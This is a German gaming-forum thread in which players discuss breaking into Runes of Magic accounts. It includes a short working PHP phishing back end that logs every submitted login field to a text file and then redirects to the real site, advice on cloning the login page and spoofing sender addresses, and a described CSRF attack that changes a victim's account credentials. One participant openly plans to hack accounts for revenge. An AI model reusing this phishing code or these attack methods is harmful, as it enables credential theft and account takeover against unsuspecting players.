ROM Account hacken

Atheuz · 06/28/2010, 17:36

Quote:

Originally Posted by metinric

danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^

Frogster interessiert sich dafür nicht, die leiten auch sowas nicht weiter an Ihre Webentwickler.

Man kann übrigens auch emails von z.B

verschicken (Allerdings nicht bekommen), da muss man sich nicht irgendwo eine fake email anlegen. Der einzigste Unterschied ist dann das der Header natürlich komplett anderster wäre als wie bei der von Frogster.

Fir3andIc3 · 06/29/2010, 12:00

Quote:

Originally Posted by Atheuz

Frogster interessiert sich dafür nicht, die leiten auch sowas nicht weiter an Ihre Webentwickler.

Man kann übrigens auch emails von z.B verschicken (Allerdings nicht bekommen), da muss man sich nicht irgendwo eine fake email anlegen. Der einzigste Unterschied ist dann das der Header natürlich komplett anderster wäre als wie bei der von Frogster.

Man kann aber von

und als empfenger Adresse eine real angeben.. fällt nicht sofort auf^^

Atheuz · 06/29/2010, 14:24

Quote:

Originally Posted by Fir3andIc3

Man kann aber von und als empfenger Adresse eine real angeben.. fällt nicht sofort auf^^

Wieso sollte man das aber machen? Man baut eine Phising form in die Email ein oder verlinkt auf eine Website, dass geht schneller und der Empfänger wird auch nicht so schnell misstrauisch als wenn man schreiben würde "Blabla schicken Sie uns Ihren Login über folgende Email

"
lol'd.

~~anonymous-f4h279~~ · 06/29/2010, 14:29

Quote:

Originally Posted by Atheuz

Wieso sollte man das aber machen? Man baut eine Phising form in die Email ein oder verlinkt auf eine Website, dass geht schneller und der Empfänger wird auch nicht so schnell misstrauisch als wenn man schreiben würde "Blabla schicken Sie uns Ihren Login über folgende Email "
lol'd.

Das Template von RoM irgendwie bekommen, auf Webspace hauen.
2 Textboxen 1 Button und wenn man was eingibt und auf Login klickt sollen die Daten an eine Email gesendet werden.

Wäre möglich, aber wie soll man an das Template kommen.

ivits · 06/29/2010, 14:34

Quote:

Originally Posted by Digital Shadow

Das ist doch ein einfacher Phishing-Versuch. Nichts spezielles mit Cookies abfangen oder so

Hier der Inhalt der post.php

PHP Code:

<?php header ('Location: http://www.runesofmagic.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Das ist aber billigstes PHP.

Bei der schwereren Variante ist mir nicht so ganz klar wie das gehen soll. Wenn ihr sagt, dass man auf keine seite geleitet wird und durch ein cookie seine daten verändert werden. Dazu müsste man ja auf der Yoshu seite die änderung vornehmen.
wäre es nicht einfacher, ein einen link auf eine seite zu machen, wo n cookie vom opfer automatisch aufgenommen wird, und dann die daten bei der eingabe speichert.

Spoiler

hab mal den quelltext genommen fehlen nur die css.

Atheuz · 06/29/2010, 14:44

Quote:

Originally Posted by Drewfire

Das Template von RoM irgendwie bekommen, auf Webspace hauen.
2 Textboxen 1 Button und wenn man was eingibt und auf Login klickt sollen die Daten an eine Email gesendet werden.

Wäre möglich, aber wie soll man an das Template kommen.

Datei->Seite Speichern. :P

Quote:

Originally Posted by ivits

Das ist aber billigstes PHP.

Bei der schwereren Variante ist mir nicht so ganz klar wie das gehen soll. Wenn ihr sagt, dass man auf keine seite geleitet wird und durch ein cookie seine daten verändert werden. Dazu müsste man ja auf der Yoshu seite die änderung vornehmen.
wäre es nicht einfacher, ein einen link auf eine seite zu machen, wo n cookie vom opfer automatisch aufgenommen wird, und dann die daten bei der eingabe speichert.

Das geht so nicht, wenn es gehen würde wären Browser die unsicherste Software zum Internet surfen. Man kann deswegen nur Cookies abfragen bzw auch speichern die nur von der eigenen Seite kommen (Da der Browser nur die zu der Webseite gehörigen Cookies an den Request anhängt), dass heißt man bräuchte erstmal eine XXS Schnittstelle um wenigstens Javascript injezieren zu können.

Emblionvirus · 06/29/2010, 15:43

Quote:

Originally Posted by Viviphyd

@Emblionvirus

Dieser "Diamanten-Hack" ist kein Hack sondern schlicht und einfach ein Keylogger (und btw der Grund wieso dein Account gehackt worden ist), sowas wie einen Diamanten oder Gold-Hack gibt und wird es nie geben.

Genauso wenig kannst du erwarten das es irgendein Kiddie-Script gibt das dir wie durch Magie tausende Accounts zufliegen lässt, auch wenn du es vielleicht nicht glaubst aber Hacken ist mit harter Arbeit und Fachwissen verbunden.

Außerdem will ich meine persönliche Meinung dazu sagen und zwar das jemanden Hacken aus "Rache" kein schöner Grund ist. Die meisten von uns hacken, botten und cheaten weil wir a) es können oder b) uns das Leben erleichtern wollen. Trotzdem heißt das nicht das wir wie die Irren durch die Gegend herumlaufen und denn Account von jedem der uns über den Weg läuft berauben nur weil wir es können, ein bisschen Moral sollte man da schon haben. Noch dazu kommt dass das Hacken eines Accounts Diebstahl gleich kommt und auch genauso hart geahndet werden kann.

Nur weil dir im RL 5 Euro verloren gehen klaust du doch auch nicht gleich einem wild Fremden 100 Euro oder?

Ich wäre froh du hast recht mit dem RL 5 Euro,ich habe viel mehr reingesteckt und aus Rache mache ich es ja... sowas lass ich mir nicht entgehen,ich setz RL Geld fürs spiel rein und NIEMAND unternimmt was dagegen,Moral habe ich schon! mein ACC wird gehackt? Das ist nichtso wie du dir es vorstellst!!Ich kann auch deine Meinung anchvollziehen.. das ihr Mehr Fachwissen was die Hacks betrifft habt... aber alleine das war mir zuviel... du wirst mich noch verstehen Vivi...

Deset · 06/29/2010, 16:09

Quote:

Originally Posted by Emblionvirus

I du wirst mich noch verstehen Vivi...

drohung?

Bedenke wie du dich gefühlt hast als dir dein Acc genommen wurde!
Und nun sag mir würdest du es in Kauf nehmen, dass ein komplett unbeteiligter genau das selbe fühlt?

Wenn du schon hackst, nimm nur das Geld runter, aber lass den acc stehen

Digital Shadow · 06/30/2010, 15:01

Danke Atheuz. Die Server werden bald bestimmt wieder um einiges sicherer

Quote:

Originally Posted by Account Hacking unsere Schuld? Hier der GEGENBEWEIS!!!, Walterbauer

Ich weiß gerade nicht ob ich jetzt weinen oder lachen soll ...

Als mein Acc vor ein paar Wochen gehackt wurde,
bekam ich vor paar Tagen auch die Antwort vom Support, das es wohl meine Schuld sei, weil ich ja ganz sicher nen infizierten PC habe und jedem dahergelaufenen meine Acc Daten weiter gebe .... ! Ne ist Klar!

Das hat mich sooo sauer gemacht das ich mich etwas schlauer über das Thema gemacht hab. Was ich dann rausgefunden habe ...?
Programmieren hier wirklich nur irgendwelche Kinder???

Zuerst dachte ich daran, die Methode detailliert an den Support zu schicken das sowas nimmer passiert, nachdem
mir der Support ja so sehr weitergeholfen hat (achtung Ironie!!!) - Doch ich kam zu dem Entschluss das hier jeder wissen soll, auf welchem heißen Eisen er sitzt und das sich KEINER mit der Supportmail abfinden soll ... Erst die Klartext Geschichte, jetzt das ....

Jedenfalls ist es über die Website und die dazugehörigen Cookies machbar die gesamten Accountdaten eines Users zu ändern!

Es kann lediglich keine spezifische Person sein die gehackt werden soll, denn jeniger muss sicher vorher einmal auf dem Yusho System angemeldet haben und darf den Browser danach nicht schliessen (damit der Cookie bestehen bleibt - Es sei denn diese werden permanent gespeichert)

Gleich vorweg - Ich werde keine Step to Step Anleitung posten oder nen Link rausgeben wo das genauer steht - An die, die mich gleich anschreiben werden, weil sie sich bereichern wollen!
Dieser Post dient nur dazu ALLE zu warnen das der eigene Account HIER ganz sicher net sicher ist!

Ladet nur alle fleißig weiter eure Dias auf um Kostüme für die verbuggten Hausmädchen zu kaufen!!!!

Jaja Frösche aber niemals Fehler zugeben ....

Um meine Stellung zu verdeutlichen, hier ein Beispiel :

User X loggt sich im Yusho Account System ein um seine Dias aufzuladen, er lässt den Browser offen (das Fenster kann ruhig geschlossen werden), geht irgendwann dann mit dieser Browser Session aufs Forum, dort schickt man ihm einen Link, wodurch man durch einen forward in dem Link einen Request an den Server mit den neuen Daten sendet, der Server akzeptiert sie!

Resultat : Man hat die GANZEN Userdaten also Username, Passwort, Email geändert!!! Und et voila aber WIR sind ja schuld! Stimmt sollten keine Dias mehr laden, dann passiert das auch nimmer!

Und da liegt der PFUSCH begraben!!! Normalerweise sollte man davon ausgehen, das ein Server wo so viele sensible Daten sind, sicher eingerichtet ist. PUSTEKUCHEN!
Denn ein vernünftig eingerichteter Server weißt Requests von anderen Servern ab, DIESER hier tut es nicht, es ist ihm Latte ob der Server oder ist!!
Jeder kann also mit ein bisschen PHP Kentnissen die kompletten Daten eines Users ändern unter obriger Vorraussetzung!

Und das ganze funktioniert sogar unter SSL - Großes Kino!

ICH SAGE ES NOCHMAL WER SICH JETZT NOCH IM YUSHO SYSTEM EINLOGGT IST SELBST SCHULD!!!

EPICFAIL!

Fir3andIc3 · 06/30/2010, 15:48

Ja das war sehr Sinnvoll öÖ Das ist einer der Gründe warum es das UG gibt ^^

wolleboiii · 06/30/2010, 18:54

wenn er das wirklich von hier hat.. naja pech

aber ganz ehrlich... hier wurde es auch nich step by step erklärt... und frogster würde mich überraschen wenn die sich mal die zeit/mühe evt sogar kosten machen würde damit ihr game/server besser/sicherer laufen... :>

btw. schade das es nicht ein ähnliches free 2 play mmo gibt wie runes.. nur halt funktionierend und weniger selbstzerstörend (kleiner wink zu den noob patches :>)

Atheuz · 06/30/2010, 19:42

Quote:

Originally Posted by Digital Shadow

Danke Atheuz. Die Server werden bald bestimmt wieder um einiges sicherer

Soll das jetzt böse sein?

Hatte ja im ersten Post bereits gesagt das ich keine Absichten habe irgendwelche Accounts einzusacken, sondern nur mal eine der vielen Lücken aufzeige, wenn das Froggster dann behebt finde ich das auch gut so..

Deset · 06/30/2010, 19:46

Aber schaut doch isn Forum von denen...

die löschen oder bearbeiten alle Posts die damit zu tun haben

und wieder ein froggie fail :P

Viviphyd · 06/30/2010, 21:19

Eine Panik von der Community zu verhindern geht mir ja noch ein aber im prinzip alles zu dementieren und kein offizieles Statement dazu abzugeben find ich absolut lächerlich, da kommt man sich ja schon fast vor wie bei der Stasi

Es ist wirklich lustig anzusehen wie bei jedem neuen Skandal von den Fröschen eine Welle an zahlenden Kunden sich vom Spiel distanziert, jedoch zwei Monate später die doppelte Anzahl an potenzielen Kunden wieder dazu kommt.

Mich wunderts ja das keiner gerichtlich gegen Frogster vorgeht. Ich hab mich zwar nicht mit denn AGB vertraut gemacht, noch bin ich generell ein Profi was Rechtliches angeht aber ich bin mir ziemlich sicher das sich da was lassen macht. Immerhin wurden einigen Spielern digitale Waren im Wert von mehreren hundert Euro entwendet, wenn man da nicht rechtlich gegen Frogsters Faulheit vorgehen kann dann hat die Judikative definitiv was falsch gemacht.

Wie wolleboiii schon gesagt hat ist es wirklich Schade das es kein vergleichbares f2p-Game gibt. Ich persönlich bau meine Hoffnungen ja auf GW2, innovatives System, geniale Grafik und sogar einmal eine interessante Story-Line aber naja, wir werden sehen was die Zukunft so bringt, vielleicht macht es bei Frogster ja doch noch Klick, hoffentlich vor dem 21. Dezember 2012 :P

Deset · 06/30/2010, 21:31

Quote:

Originally Posted by Viviphyd

Mich wunderts ja das keiner gerichtlich gegen Frogster vorgeht. Ich hab mich zwar nicht mit denn AGB vertraut gemacht, noch bin ich generell ein Profi was Rechtliches angeht aber ich bin mir ziemlich sicher das sich da was lassen macht. Immerhin wurden einigen Spielern digitale Waren im Wert von mehreren hundert Euro entwendet, wenn man da nicht rechtlich gegen Frogsters Faulheit vorgehen kann dann hat die Judikative definitiv was falsch gemacht.

Ich habe mich schonmal bei denen durch die AGB gelesen..
ist alles nicht ganz so fest wie die sich vllt erhoffen

Quote:

Originally Posted by Viviphyd

Ich persönlich bau meine Hoffnungen ja auf GW2, innovatives System, geniale Grafik und sogar einmal eine interessante Story-Line

<3